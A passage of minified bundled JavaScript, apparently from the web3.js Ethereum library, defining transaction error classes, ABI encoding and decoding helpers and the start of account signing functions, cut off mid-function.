                        super(e), this.reason = e, this.customErrorName = t, this.customErrorDecodedSignature = r, this.customErrorArguments = i, this.signature = o, this.receipt = s, this.data = a, this.code = n.ERR_TX_REVERT_TRANSACTION_CUSTOM_ERROR;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            reason: this.reason,
                            customErrorName: this.customErrorName,
                            customErrorDecodedSignature: this.customErrorDecodedSignature,
                            customErrorArguments: this.customErrorArguments,
                            signature: this.signature,
                            receipt: this.receipt,
                            data: this.data
                        });
                    }
                }, t.NoContractAddressFoundError = class extends o {
                    constructor(e){
                        super("The transaction receipt didn't contain a contract address.", e), this.code = n.ERR_TX_NO_CONTRACT_ADDRESS;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            receipt: this.receipt
                        });
                    }
                }, t.ContractCodeNotStoredError = class extends o {
                    constructor(e){
                        super("The contract code couldn't be stored, please check your gas limit.", e), this.code = n.ERR_TX_CONTRACT_NOT_STORED;
                    }
                }, t.TransactionRevertedWithoutReasonError = class extends o {
                    constructor(e){
                        super("Transaction has been reverted by the EVM" + (void 0 === e ? "" : `:\n ${i.BaseWeb3Error.convertToString(e)}`), e), this.code = n.ERR_TX_REVERT_WITHOUT_REASON;
                    }
                }, t.TransactionOutOfGasError = class extends o {
                    constructor(e){
                        super(`Transaction ran out of gas. Please provide more gas:\n ${JSON.stringify(e, void 0, 2)}`, e), this.code = n.ERR_TX_OUT_OF_GAS;
                    }
                }, t.UndefinedRawTransactionError = class extends o {
                    constructor(){
                        super("Raw transaction undefined"), this.code = n.ERR_RAW_TX_UNDEFINED;
                    }
                }, t.TransactionNotFound = class extends o {
                    constructor(){
                        super("Transaction not found"), this.code = n.ERR_TX_NOT_FOUND;
                    }
                };
                class u extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction with invalid sender"), this.code = n.ERR_TX_INVALID_SENDER;
                    }
                }
                t.InvalidTransactionWithSender = u;
                class c extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction with invalid receiver"), this.code = n.ERR_TX_INVALID_RECEIVER;
                    }
                }
                t.InvalidTransactionWithReceiver = c;
                class l extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction call"), this.code = n.ERR_TX_INVALID_CALL;
                    }
                }
                t.InvalidTransactionCall = l;
                class d extends i.InvalidValueError {
                    constructor(){
                        super("MissingCustomChainError", "If tx.common is provided it must have tx.common.customChain"), this.code = n.ERR_TX_MISSING_CUSTOM_CHAIN;
                    }
                }
                t.MissingCustomChainError = d;
                class h extends i.InvalidValueError {
                    constructor(){
                        super("MissingCustomChainIdError", "If tx.common is provided it must have tx.common.customChain and tx.common.customChain.chainId"), this.code = n.ERR_TX_MISSING_CUSTOM_CHAIN_ID;
                    }
                }
                t.MissingCustomChainIdError = h;
                class f extends i.InvalidValueError {
                    constructor(e){
                        super(JSON.stringify(e), "Chain Id doesnt match in tx.chainId tx.common.customChain.chainId"), this.code = n.ERR_TX_CHAIN_ID_MISMATCH;
                    }
                }
                t.ChainIdMismatchError = f;
                class p extends i.InvalidValueError {
                    constructor(e){
                        super(JSON.stringify(e), "Chain doesnt match in tx.chain tx.common.basechain"), this.code = n.ERR_TX_CHAIN_MISMATCH;
                    }
                }
                t.ChainMismatchError = p;
                class m extends i.InvalidValueError {
                    constructor(e){
                        super(JSON.stringify(e), "hardfork doesnt match in tx.hardfork tx.common.hardfork"), this.code = n.ERR_TX_HARDFORK_MISMATCH;
                    }
                }
                t.HardforkMismatchError = m;
                class g extends i.InvalidValueError {
                    constructor(){
                        super("CommonOrChainAndHardforkError", "Please provide the common object or the chain and hardfork property but not all together."), this.code = n.ERR_TX_INVALID_CHAIN_INFO;
                    }
                }
                t.CommonOrChainAndHardforkError = g;
                class y extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super("MissingChainOrHardforkError", `When specifying chain and hardfork, both values must be defined. Received "chain": ${null !== (t = e.chain) && void 0 !== t ? t : "undefined"}, "hardfork": ${null !== (r = e.hardfork) && void 0 !== r ? r : "undefined"}`), this.code = n.ERR_TX_MISSING_CHAIN_INFO;
                    }
                }
                t.MissingChainOrHardforkError = y;
                class v extends i.InvalidValueError {
                    constructor(e){
                        var t, r, i, o;
                        super(`gas: ${null !== (t = e.gas) && void 0 !== t ? t : "undefined"}, gasPrice: ${null !== (r = e.gasPrice) && void 0 !== r ? r : "undefined"}, maxPriorityFeePerGas: ${null !== (i = e.maxPriorityFeePerGas) && void 0 !== i ? i : "undefined"}, maxFeePerGas: ${null !== (o = e.maxFeePerGas) && void 0 !== o ? o : "undefined"}`, '"gas" is missing'), this.code = n.ERR_TX_MISSING_GAS;
                    }
                }
                t.MissingGasError = v;
                class b extends i.InvalidValueError {
                    constructor(e){
                        var t, r, i, o;
                        super(`gas: ${null !== (t = e.gas) && void 0 !== t ? t : "undefined"}, gasPrice: ${null !== (r = e.gasPrice) && void 0 !== r ? r : "undefined"}, maxPriorityFeePerGas: ${null !== (i = e.maxPriorityFeePerGas) && void 0 !== i ? i : "undefined"}, maxFeePerGas: ${null !== (o = e.maxFeePerGas) && void 0 !== o ? o : "undefined"}`, "transaction must specify legacy or fee market gas properties, not both"), this.code = n.ERR_TX_GAS_MISMATCH;
                    }
                }
                t.TransactionGasMismatchError = b;
                class E extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`gas: ${null !== (t = e.gas) && void 0 !== t ? t : "undefined"}, gasPrice: ${null !== (r = e.gasPrice) && void 0 !== r ? r : "undefined"}`, "Gas or gasPrice is lower than 0"), this.code = n.ERR_TX_INVALID_LEGACY_GAS;
                    }
                }
                t.InvalidGasOrGasPrice = E;
                class A extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`maxPriorityFeePerGas: ${null !== (t = e.maxPriorityFeePerGas) && void 0 !== t ? t : "undefined"}, maxFeePerGas: ${null !== (r = e.maxFeePerGas) && void 0 !== r ? r : "undefined"}`, "maxPriorityFeePerGas or maxFeePerGas is lower than 0"), this.code = n.ERR_TX_INVALID_FEE_MARKET_GAS;
                    }
                }
                t.InvalidMaxPriorityFeePerGasOrMaxFeePerGas = A;
                class _ extends i.InvalidValueError {
                    constructor(e){
                        super(e, "eip-1559 transactions don't support gasPrice"), this.code = n.ERR_TX_INVALID_FEE_MARKET_GAS_PRICE;
                    }
                }
                t.Eip1559GasPriceError = _;
                class w extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`maxPriorityFeePerGas: ${null !== (t = e.maxPriorityFeePerGas) && void 0 !== t ? t : "undefined"}, maxFeePerGas: ${null !== (r = e.maxFeePerGas) && void 0 !== r ? r : "undefined"}`, "pre-eip-1559 transaction don't support maxFeePerGas/maxPriorityFeePerGas"), this.code = n.ERR_TX_INVALID_LEGACY_FEE_MARKET;
                    }
                }
                t.UnsupportedFeeMarketError = w;
                class T extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction object"), this.code = n.ERR_TX_INVALID_OBJECT;
                    }
                }
                t.InvalidTransactionObjectError = T;
                class R extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`nonce: ${null !== (t = e.nonce) && void 0 !== t ? t : "undefined"}, chainId: ${null !== (r = e.chainId) && void 0 !== r ? r : "undefined"}`, "Nonce or chainId is lower than 0"), this.code = n.ERR_TX_INVALID_NONCE_OR_CHAIN_ID;
                    }
                }
                t.InvalidNonceOrChainIdError = R;
                class I extends i.InvalidValueError {
                    constructor(){
                        super("UnableToPopulateNonceError", "unable to populate nonce, no from address available"), this.code = n.ERR_TX_UNABLE_TO_POPULATE_NONCE;
                    }
                }
                t.UnableToPopulateNonceError = I;
                class S extends i.InvalidValueError {
                    constructor(){
                        super("Eip1559NotSupportedError", "Network doesn't support eip-1559"), this.code = n.ERR_TX_UNSUPPORTED_EIP_1559;
                    }
                }
                t.Eip1559NotSupportedError = S;
                class P extends i.InvalidValueError {
                    constructor(e){
                        super(e, "unsupported transaction type"), this.code = n.ERR_TX_UNSUPPORTED_TYPE;
                    }
                }
                t.UnsupportedTransactionTypeError = P;
                class O extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`data: ${null !== (t = e.data) && void 0 !== t ? t : "undefined"}, input: ${null !== (r = e.input) && void 0 !== r ? r : "undefined"}`, 'You can\'t have "data" and "input" as properties of transactions at the same time, please use either "data" or "input" instead.'), this.code = n.ERR_TX_DATA_AND_INPUT;
                    }
                }
                t.TransactionDataAndInputError = O;
                class x extends i.BaseWeb3Error {
                    constructor(e){
                        super(`The connected Ethereum Node did not respond within ${e.numberOfSeconds} seconds, please make sure your transaction was properly sent and you are connected to a healthy Node. Be aware that transaction might still be pending or mined!\n\tTransaction Hash: ${e.transactionHash ? e.transactionHash.toString() : "not available"}`), this.code = n.ERR_TX_SEND_TIMEOUT;
                    }
                }
                function M(e) {
                    return `Please make sure your transaction was properly sent and there no pervious pending transaction for the same account. However, be aware that it might still be mined!\n\tTransaction Hash: ${e ? e.toString() : "not available"}`;
                }
                t.TransactionSendTimeoutError = x;
                class B extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Transaction was not mined within ${e.numberOfSeconds} seconds. ${M(e.transactionHash)}`), this.code = n.ERR_TX_POLLING_TIMEOUT;
                    }
                }
                t.TransactionPollingTimeoutError = B;
                class N extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Transaction started at ${e.starterBlockNumber} but was not mined within ${e.numberOfBlocks} blocks. ${M(e.transactionHash)}`), this.code = n.ERR_TX_BLOCK_TIMEOUT;
                    }
                }
                t.TransactionBlockTimeoutError = N;
                class C extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`receipt: ${JSON.stringify(e.receipt)}, blockHash: ${null === (t = e.blockHash) || void 0 === t ? void 0 : t.toString()}, transactionHash: ${null === (r = e.transactionHash) || void 0 === r ? void 0 : r.toString()}`, "Receipt missing or blockHash null"), this.code = n.ERR_TX_RECEIPT_MISSING_OR_BLOCKHASH_NULL;
                    }
                }
                t.TransactionMissingReceiptOrBlockHashError = C;
                class k extends i.InvalidValueError {
                    constructor(e){
                        super(`receipt: ${JSON.stringify(e.receipt)}`, "Receipt missing block number"), this.code = n.ERR_TX_RECEIPT_MISSING_BLOCK_NUMBER;
                    }
                }
                t.TransactionReceiptMissingBlockNumberError = k;
                class L extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Invalid signature. "${e}"`), this.code = n.ERR_TX_SIGNING;
                    }
                }
                t.TransactionSigningError = L;
                class F extends i.InvalidValueError {
                    constructor(){
                        super("LocalWalletNotAvailableError", "Attempted to index account in local wallet, but no wallet is available"), this.code = n.ERR_TX_LOCAL_WALLET_NOT_AVAILABLE;
                    }
                }
                t.LocalWalletNotAvailableError = F;
                class D extends i.BaseWeb3Error {
                    constructor(e, t){
                        const r = [];
                        e.forEach((e)=>r.push(e.keyword.match(/data.(.+)/)[1])), super(`The following properties are invalid for the transaction type ${t}: ${r.join(", ")}`), this.code = n.ERR_TX_INVALID_PROPERTIES_FOR_TYPE;
                    }
                }
                t.InvalidPropertiesForTransactionTypeError = D;
            },
            4618: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidTypeAbiInputError = t.InvalidBlockError = t.InvalidLargeValueError = t.InvalidSizeError = t.InvalidUnsignedIntegerError = t.InvalidBooleanError = t.InvalidTypeError = t.NibbleWidthError = t.HexProcessingError = t.InvalidUnitError = t.InvalidStringError = t.InvalidAddressError = t.InvalidNumberError = t.InvalidBytesError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.InvalidValueError {
                    constructor(e){
                        super(e, "can not parse as byte data"), this.code = n.ERR_INVALID_BYTES;
                    }
                }
                t.InvalidBytesError = o;
                class s extends i.InvalidValueError {
                    constructor(e){
                        super(e, "can not parse as number data"), this.code = n.ERR_INVALID_NUMBER;
                    }
                }
                t.InvalidNumberError = s;
                class a extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid ethereum address"), this.code = n.ERR_INVALID_ADDRESS;
                    }
                }
                t.InvalidAddressError = a;
                class u extends i.InvalidValueError {
                    constructor(e){
                        super(e, "not a valid string"), this.code = n.ERR_INVALID_STRING;
                    }
                }
                t.InvalidStringError = u;
                class c extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid unit"), this.code = n.ERR_INVALID_UNIT;
                    }
                }
                t.InvalidUnitError = c;
                class l extends i.InvalidValueError {
                    constructor(e){
                        super(e, "can not be converted to hex"), this.code = n.ERR_INVALID_HEX;
                    }
                }
                t.HexProcessingError = l;
                class d extends i.InvalidValueError {
                    constructor(e){
                        super(e, "value greater than the nibble width"), this.code = n.ERR_INVALID_NIBBLE_WIDTH;
                    }
                }
                t.NibbleWidthError = d;
                class h extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid type, type not supported"), this.code = n.ERR_INVALID_TYPE;
                    }
                }
                t.InvalidTypeError = h;
                class f extends i.InvalidValueError {
                    constructor(e){
                        super(e, "not a valid boolean."), this.code = n.ERR_INVALID_BOOLEAN;
                    }
                }
                t.InvalidBooleanError = f;
                class p extends i.InvalidValueError {
                    constructor(e){
                        super(e, "not a valid unsigned integer."), this.code = n.ERR_INVALID_UNSIGNED_INTEGER;
                    }
                }
                t.InvalidUnsignedIntegerError = p;
                class m extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid size given."), this.code = n.ERR_INVALID_SIZE;
                    }
                }
                t.InvalidSizeError = m;
                class g extends i.InvalidValueError {
                    constructor(e){
                        super(e, "value is larger than size."), this.code = n.ERR_INVALID_LARGE_VALUE;
                    }
                }
                t.InvalidLargeValueError = g;
                class y extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid string given"), this.code = n.ERR_INVALID_BLOCK;
                    }
                }
                t.InvalidBlockError = y;
                class v extends i.InvalidValueError {
                    constructor(e){
                        super(e, "components found but type is not tuple"), this.code = n.ERR_INVALID_TYPE_ABI;
                    }
                }
                t.InvalidTypeAbiInputError = v;
            },
            5071: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(7639), t), i(r(3685), t), i(r(8105), t), i(r(3789), t), i(r(510), t), i(r(1591), t), i(r(7297), t), i(r(7108), t), i(r(1075), t), i(r(8450), t), i(r(4618), t), i(r(9491), t), i(r(3628), t), i(r(655), t);
            },
            3685: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidValueError = t.BaseWeb3Error = void 0;
                class r extends Error {
                    constructor(e, t){
                        super(e), this.innerError = t, this.name = this.constructor.name, "function" == typeof Error.captureStackTrace ? Error.captureStackTrace(new.target.constructor) : this.stack = (new Error).stack;
                    }
                    static convertToString(e, t = !1) {
                        if (null == e) return "undefined";
                        const r = JSON.stringify(e, (e, t)=>"bigint" == typeof t ? t.toString() : t);
                        return t && [
                            "bigint",
                            "string"
                        ].includes(typeof e) ? r.replace(/['\\"]+/g, "") : r;
                    }
                    toJSON() {
                        return {
                            name: this.name,
                            code: this.code,
                            message: this.message,
                            innerError: this.innerError
                        };
                    }
                }
                t.BaseWeb3Error = r, t.InvalidValueError = class extends r {
                    constructor(e, t){
                        super(`Invalid value given "${r.convertToString(e, !0)}". Error: ${t}.`), this.name = this.constructor.name;
                    }
                };
            },
            9722: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeErrorSignature = void 0;
                const n = r(9634), i = r(5071), o = r(1583);
                t.encodeErrorSignature = (e)=>{
                    if ("string" != typeof e && !(0, o.isAbiErrorFragment)(e)) throw new i.AbiError("Invalid parameter value in encodeErrorSignature");
                    let t;
                    return t = !e || "function" != typeof e && "object" != typeof e ? e : (0, o.jsonInterfaceMethodToString)(e), (0, n.sha3Raw)(t);
                };
            },
            5893: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeEventSignature = void 0;
                const n = r(9634), i = r(5071), o = r(1583);
                t.encodeEventSignature = (e)=>{
                    if ("string" != typeof e && !(0, o.isAbiEventFragment)(e)) throw new i.AbiError("Invalid parameter value in encodeEventSignature");
                    let t;
                    return t = !e || "function" != typeof e && "object" != typeof e ? e : (0, o.jsonInterfaceMethodToString)(e), (0, n.sha3Raw)(t);
                };
            },
            3249: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeFunctionCall = t.encodeFunctionSignature = void 0;
                const n = r(5071), i = r(9634), o = r(1583), s = r(4566);
                t.encodeFunctionSignature = (e)=>{
                    if ("string" != typeof e && !(0, o.isAbiFunctionFragment)(e)) throw new n.AbiError("Invalid parameter value in encodeFunctionSignature");
                    let t;
                    return t = !e || "function" != typeof e && "object" != typeof e ? e : (0, o.jsonInterfaceMethodToString)(e), (0, i.sha3Raw)(t).slice(0, 10);
                }, t.encodeFunctionCall = (e, r)=>{
                    var i;
                    if (!(0, o.isAbiFunctionFragment)(e)) throw new n.AbiError("Invalid parameter value in encodeFunctionCall");
                    return `${(0, t.encodeFunctionSignature)(e)}${(0, s.encodeParameters)(null !== (i = e.inputs) && void 0 !== i ? i : [], null != r ? r : []).replace("0x", "")}`;
                };
            },
            734: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeLog = void 0;
                const n = r(4566), i = [
                    "bool",
                    "string",
                    "int",
                    "uint",
                    "address",
                    "fixed",
                    "ufixed"
                ];
                t.decodeLog = (e, t, r)=>{
                    const o = Array.isArray(r) ? r : [
                        r
                    ], s = {}, a = {};
                    for (const [t, r] of e.entries())r.indexed ? s[t] = r : a[t] = r;
                    const u = t ? (0, n.decodeParametersWith)(Object.values(a), t, !0) : {
                        __length__: 0
                    }, c = o.length - Object.keys(s).length, l = Object.values(s).map((e, t)=>{
                        var r, s;
                        return i.some((t)=>e.type.startsWith(t)) ? (r = e.type, s = o[t + c], "string" === r ? s : (0, n.decodeParameter)(r, s)) : o[t + c];
                    }), d = {
                        __length__: 0
                    };
                    let h = 0, f = 0;
                    for (const [t, r] of e.entries())d[t] = "string" === r.type ? "" : void 0, s[t] && (d[t] = l[h], h += 1), a[t] && (d[t] = u[String(f)], f += 1), r.name && (d[r.name] = d[t]), d.__length__ += 1;
                    return d;
                };
            },
            4566: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeParameter = t.decodeParameters = t.decodeParametersWith = t.encodeParameter = t.encodeParameters = void 0;
                const i = r(5071), o = r(3260), s = n(r(5228)), a = r(1583);
                t.encodeParameters = (e, t)=>{
                    try {
                        const r = (0, a.mapTypes)(Array.isArray(e) ? e : [
                            e
                        ]), n = [];
                        for (const [e, i] of t.entries()){
                            const t = r[e];
                            let u;
                            u = (0, a.isAbiFragment)(t) && t.type ? t.type : t;
                            const c = (0, a.formatParam)(u, i);
                            if ("string" == typeof u && u.includes("tuple")) {
                                const e = s.default._getCoder(o.ParamType.from(u));
                                (0, a.modifyParams)(e, [
                                    c
                                ]);
                            }
                            n.push(c);
                        }
                        return s.default.encode(r.map((e)=>o.ParamType.from(e)), n);
                    } catch (e) {
                        throw new i.AbiError("Parameter encoding error", e);
                    }
                }, t.encodeParameter = (e, r)=>(0, t.encodeParameters)([
                        e
                    ], [
                        r
                    ]);
                const u = (e)=>Array.isArray(e) && Object.keys(e).filter((e)=>Number.isInteger(+e)).length !== Object.keys(e).length, c = (e)=>{
                    const t = {
                        __length__: 0
                    };
                    for (const r of Object.keys(e))t[r] = Array.isArray(e[r]) && u(e[r]) ? c(e[r]) : e[r], t.__length__ += Number.isInteger(+r) ? 1 : 0;
                    return t;
                };
                t.decodeParametersWith = (e, t, r)=>{
                    try {
                        if (e.length > 0 && (!t || "0x" === t || "0X" === t)) throw new i.AbiError("Returned values aren't valid, did it run Out of Gas? You might also see this error if you are not using the correct ABI for the contract you are retrieving data from, requesting data from a block number that does not exist, or querying a node which is not fully synced.");
                        const n = s.default.decode((0, a.mapTypes)(e).map((e)=>o.ParamType.from(e)), `0x${t.replace(/0x/i, "")}`, r);
                        return c(n);
                    } catch (e) {
                        throw new i.AbiError(`Parameter decoding error: ${e.message}`);
                    }
                }, t.decodeParameters = (e, r)=>(0, t.decodeParametersWith)(e, r, !1), t.decodeParameter = (e, r)=>(0, t.decodeParameters)([
                        e
                    ], r)[0];
            },
            5610: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeContractErrorData = void 0;
                const n = r(9722), i = r(4566), o = r(1583);
                t.decodeContractErrorData = (e, t)=>{
                    if (null == t ? void 0 : t.data) {
                        let r, s, a;
                        try {
                            const u = t.data.slice(0, 10), c = e.find((e)=>(0, n.encodeErrorSignature)(e).startsWith(u));
                            (null == c ? void 0 : c.inputs) && (r = c.name, s = (0, o.jsonInterfaceMethodToString)(c), a = (0, i.decodeParameters)([
                                ...c.inputs
                            ], t.data.substring(10)));
                        } catch (e) {
                            console.error(e);
                        }
                        r && t.setDecodedProperties(r, s, a);
                    }
                };
            },
            5228: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const n = new (r(3260)).AbiCoder((e, t)=>(null == t ? void 0 : t._isBigNumber) ? t.toBigInt() : t);
                t.default = n;
            },
            8381: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(9722), t), i(r(5893), t), i(r(3249), t), i(r(734), t), i(r(4566), t), i(r(1583), t), i(r(5610), t);
            },
            1583: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.jsonInterfaceMethodToString = t.flattenTypes = t.modifyParams = t.formatParam = t.formatOddHexstrings = t.isOddHexstring = t.mapTypes = t.mapStructToCoderFormat = t.mapStructNameAndType = t.isSimplifiedStructFormat = t.isAbiConstructorFragment = t.isAbiFunctionFragment = t.isAbiEventFragment = t.isAbiErrorFragment = t.isAbiFragment = void 0;
                const i = r(5071), o = r(3260), s = r(9634), a = n(r(5228));
                t.isAbiFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && [
                        "function",
                        "event",
                        "constructor",
                        "error"
                    ].includes(e.type), t.isAbiErrorFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "error" === e.type, t.isAbiEventFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "event" === e.type, t.isAbiFunctionFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "function" === e.type, t.isAbiConstructorFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "constructor" === e.type, t.isSimplifiedStructFormat = (e)=>"object" == typeof e && void 0 === e.components && void 0 === e.name, t.mapStructNameAndType = (e)=>e.includes("[]") ? {
                        type: "tuple[]",
                        name: e.slice(0, -2)
                    } : {
                        type: "tuple",
                        name: e
                    }, t.mapStructToCoderFormat = (e)=>{
                    const r = [];
                    for (const n of Object.keys(e)){
                        const i = e[n];
                        "object" == typeof i ? r.push(Object.assign(Object.assign({}, (0, t.mapStructNameAndType)(n)), {
                            components: (0, t.mapStructToCoderFormat)(i)
                        })) : r.push({
                            name: n,
                            type: e[n]
                        });
                    }
                    return r;
                }, t.mapTypes = (e)=>{
                    const r = [];
                    for (const n of e){
                        let e = n;
                        if ("object" == typeof n && (e = Object.assign({}, n)), "object" == typeof n && "function" === n.type && (e = Object.assign(Object.assign({}, n), {
                            type: "bytes24"
                        })), (0, t.isSimplifiedStructFormat)(e)) {
                            const n = Object.keys(e)[0];
                            r.push(Object.assign(Object.assign({}, (0, t.mapStructNameAndType)(n)), {
                                components: (0, t.mapStructToCoderFormat)(e[n])
                            }));
                        } else r.push(e);
                    }
                    return r;
                }, t.isOddHexstring = (e)=>"string" == typeof e && /^(-)?0x[0-9a-f]*$/i.test(e) && e.length % 2 == 1, t.formatOddHexstrings = (e)=>(0, t.isOddHexstring)(e) ? `0x0${e.substring(2)}` : e, t.formatParam = (e, r)=>{
                    var n;
                    const i = "object" != typeof r || Array.isArray(r) ? r : Object.assign({}, r);
                    if (i instanceof BigInt) return i.toString(10);
                    if (/^bytes([0-9]*)\[\]$/.exec(e) || /^(u?int)([0-9]*)\[\]$/.exec(e)) return [
                        ...i
                    ].map((r)=>(0, t.formatParam)(e.replace("[]", ""), r));
                    let o = /^(u?int)([0-9]*)$/.exec(e);
                    if (o) {
                        const e = parseInt(null !== (n = o[2]) && void 0 !== n ? n : "256", 10);
                        if (e / 8 < i.length) return (0, s.leftPad)(i, e);
                    }
                    if (o = /^bytes([0-9]*)$/.exec(e), o) {
                        const e = i instanceof Uint8Array ? (0, s.toHex)(i) : i, r = parseInt(o[1], 10);
                        if (r) {
                            let n = 2 * r;
                            i.startsWith("0x") && (n += 2);
                            const o = e.length < n ? (0, s.rightPad)(i, 2 * r) : e;
                            return (0, t.formatOddHexstrings)(o);
                        }
                        return (0, t.formatOddHexstrings)(e);
                    }
                    return i;
                }, t.modifyParams = (e, r)=>"array" === e.name ? r.map((r)=>(0, t.modifyParams)(a.default._getCoder(o.ParamType.from(e.type.replace("[]", ""))), [
                            r
                        ])) : (e.coders.forEach((e, n)=>{
                        "tuple" === e.name ? (0, t.modifyParams)(e, [
                            r[n]
                        ]) : r[n] = (0, t.formatParam)(e.name, r[n]);
                    }), []), t.flattenTypes = (e, r)=>{
                    const n = [];
                    return r.forEach((r)=>{
                        if ("object" == typeof r.components) {
                            if (!r.type.startsWith("tuple")) throw new i.AbiError(`Invalid value given "${r.type}". Error: components found but type is not tuple.`);
                            const o = r.type.indexOf("["), s = o >= 0 ? r.type.substring(o) : "", a = (0, t.flattenTypes)(e, r.components);
                            Array.isArray(a) && e ? n.push(`tuple(${a.join(",")})${s}`) : e ? n.push(`(${a.join()})`) : n.push(`(${a.join(",")})${s}`);
                        } else n.push(r.type);
                    }), n;
                }, t.jsonInterfaceMethodToString = (e)=>{
                    var r, n, i, o;
                    return (0, t.isAbiErrorFragment)(e) || (0, t.isAbiEventFragment)(e) || (0, t.isAbiFunctionFragment)(e) ? (null === (r = e.name) || void 0 === r ? void 0 : r.includes("(")) ? e.name : `${null !== (n = e.name) && void 0 !== n ? n : ""}(${(0, t.flattenTypes)(!1, null !== (i = e.inputs) && void 0 !== i ? i : []).join(",")})` : `(${(0, t.flattenTypes)(!1, null !== (o = e.inputs) && void 0 !== o ? o : []).join(",")})`;
                };
            },
            1560: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decrypt = t.create = t.privateKeyToAccount = t.encrypt = t.privateKeyToAddress = t.recover = t.recoverTransaction = t.signTransaction = t.sign = t.hashMessage = t.parseAndValidatePrivateKey = void 0;
                const i = r(3072), o = r(8109), s = r(7002), a = r(5071), u = r(9634), c = r(7345), l = r(4555), d = r(5774), h = r(7668);
                t.parseAndValidatePrivateKey = (e, t)=>{
                    let r;
                    if (!t && "string" == typeof e && (0, c.isHexStrict)(e) && 66 !== e.length) throw new a.PrivateKeyLengthError;
                    try {
                        r = e instanceof Uint8Array ? e : (0, u.bytesToUint8Array)(e);
                    } catch (e) {
                        throw new a.InvalidPrivateKeyError;
                    }
                    if (!t && 32 !== r.byteLength) throw new a.PrivateKeyLengthError;
                    return r;
                }, t.hashMessage = (e)=>{
                    const t = (0, c.isHexStrict)(e) ? e : (0, u.utf8ToHex)(e), r = (0, u.hexToBytes)(t), n = (0, u.hexToBytes)((0, u.fromUtf8)(`Ethereum Signed Message:\n${r.byteLength}`)), i = (0, u.uint8ArrayConcat)(n, r);
                    return (0, u.sha3Raw)(i);
                }, t.sign = (e, r)=>{
